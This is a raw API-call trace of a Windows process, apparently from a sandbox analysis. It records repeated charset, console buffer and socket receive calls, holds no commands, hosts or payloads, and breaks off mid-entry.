[0192.651] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.651] GetConsoleOutputCP () returned 0x1b5 [0192.651] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.651] GetConsoleOutputCP () returned 0x1b5 [0192.651] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.651] GetConsoleOutputCP () returned 0x1b5 [0192.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.652] GetConsoleOutputCP () returned 0x1b5 [0192.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.652] GetConsoleOutputCP () returned 0x1b5 [0192.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.652] GetConsoleOutputCP () returned 0x1b5 [0192.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.652] GetConsoleOutputCP () returned 0x1b5 [0192.653] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.653] GetConsoleOutputCP () returned 0x1b5 [0192.653] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.653] GetConsoleOutputCP () returned 0x1b5 [0192.653] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.653] GetConsoleOutputCP () returned 0x1b5 [0192.654] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.654] GetConsoleOutputCP () returned 0x1b5 [0192.654] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.654] GetConsoleOutputCP () returned 0x1b5 [0192.654] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.654] GetConsoleOutputCP () returned 0x1b5 [0192.654] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.655] GetConsoleOutputCP () returned 0x1b5 [0192.655] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.655] GetConsoleOutputCP () returned 0x1b5 [0192.655] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.655] GetConsoleOutputCP () returned 0x1b5 [0192.657] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.658] GetConsoleOutputCP () returned 0x1b5 [0192.658] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.658] GetConsoleOutputCP () returned 0x1b5 [0192.658] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.658] GetConsoleOutputCP () returned 0x1b5 [0192.659] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.659] GetConsoleOutputCP () returned 0x1b5 [0192.659] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.659] GetConsoleOutputCP () returned 0x1b5 [0192.659] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.659] GetConsoleOutputCP () returned 0x1b5 [0192.660] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.660] GetConsoleOutputCP () returned 0x1b5 [0192.660] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.660] GetConsoleOutputCP () returned 0x1b5 [0192.660] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.660] GetConsoleOutputCP () returned 0x1b5 [0192.660] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.660] GetConsoleOutputCP () returned 0x1b5 [0192.661] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.661] GetConsoleOutputCP () returned 0x1b5 [0192.661] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.661] GetConsoleOutputCP () returned 0x1b5 [0192.661] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.661] GetConsoleOutputCP () returned 0x1b5 [0192.662] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.662] GetConsoleOutputCP () returned 0x1b5 [0192.662] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.662] GetConsoleOutputCP () returned 0x1b5 [0192.662] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.662] GetConsoleOutputCP () returned 0x1b5 [0192.662] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.663] GetConsoleOutputCP () returned 0x1b5 [0192.663] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.663] GetConsoleOutputCP () returned 0x1b5 [0192.663] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.663] GetConsoleOutputCP () returned 0x1b5 [0192.663] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.663] GetConsoleOutputCP () returned 0x1b5 [0192.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.664] GetConsoleOutputCP () returned 0x1b5 [0192.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.664] GetConsoleOutputCP () returned 0x1b5 [0192.664] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e168 | out: lpConsoleScreenBufferInfo=0xafa508e168) returned 1 [0192.685] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e118 | out: lpConsoleScreenBufferInfo=0xafa508e118) returned 1 [0192.686] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0192.686] ReadConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpReadRegion=0xafa508e040 | out: lpBuffer=0x2386d738460, lpReadRegion=0xafa508e040) returned 1 [0192.688] CoTaskMemFree (pv=0x2386d738460) [0192.688] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508df78 | out: lpConsoleScreenBufferInfo=0xafa508df78) returned 1 [0192.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e168 | out: lpConsoleScreenBufferInfo=0xafa508e168) returned 1 [0192.691] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0192.692] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e000 | out: lpWriteRegion=0xafa508e000) returned 1 [0192.696] CoTaskMemFree (pv=0x2386d738460) [0192.702] setsockopt (s=0x7fc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0192.702] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0192.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0192.799] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0192.800] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0192.800] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0192.801] CoTaskMemFree (pv=0x2386d738460) [0192.801] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0192.805] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0192.806] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0192.888] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0192.889] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0192.889] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0192.889] CoTaskMemFree (pv=0x2386d738460) [0192.890] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0192.890] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0192.890] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.033] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.034] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.034] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.036] CoTaskMemFree (pv=0x2386d738460) [0193.037] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.037] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.037] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.185] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.186] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.186] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.188] CoTaskMemFree (pv=0x2386d738460) [0193.188] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.189] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.189] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.276] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.276] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.276] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.277] CoTaskMemFree (pv=0x2386d738460) [0193.277] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.278] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.278] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.367] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.368] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.368] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.369] CoTaskMemFree (pv=0x2386d738460) [0193.369] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.369] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.369] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.454] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.455] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.455] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.455] CoTaskMemFree (pv=0x2386d738460) [0193.456] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.470] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.471] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.564] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.565] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.565] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.568] CoTaskMemFree (pv=0x2386d738460) [0193.568] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.568] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.568] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.665] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.665] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.666] CoTaskMemFree (pv=0x2386d738460) [0193.666] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.666] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.666] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.757] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.758] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.758] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.759] CoTaskMemFree (pv=0x2386d738460) [0193.759] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.759] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.760] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.848] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.851] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.851] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.852] CoTaskMemFree (pv=0x2386d738460) [0193.852] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.852] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.852] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.939] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.940] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0193.940] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0193.945] CoTaskMemFree (pv=0x2386d738460) [0193.945] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0193.945] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0193.946] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.030] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.031] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.031] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.034] CoTaskMemFree (pv=0x2386d738460) [0194.034] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.034] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.035] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.228] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.228] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.228] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.229] CoTaskMemFree (pv=0x2386d738460) [0194.229] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.312] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.313] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.313] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.313] CoTaskMemFree (pv=0x2386d738460) [0194.313] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.314] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.314] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.400] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.400] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.400] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.401] CoTaskMemFree (pv=0x2386d738460) [0194.401] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.402] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.402] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.497] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.498] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.498] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.498] CoTaskMemFree (pv=0x2386d738460) [0194.499] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.499] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.499] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.596] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.597] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.597] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.598] CoTaskMemFree (pv=0x2386d738460) [0194.598] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.599] GetConsoleScreenBufferInfo (in: 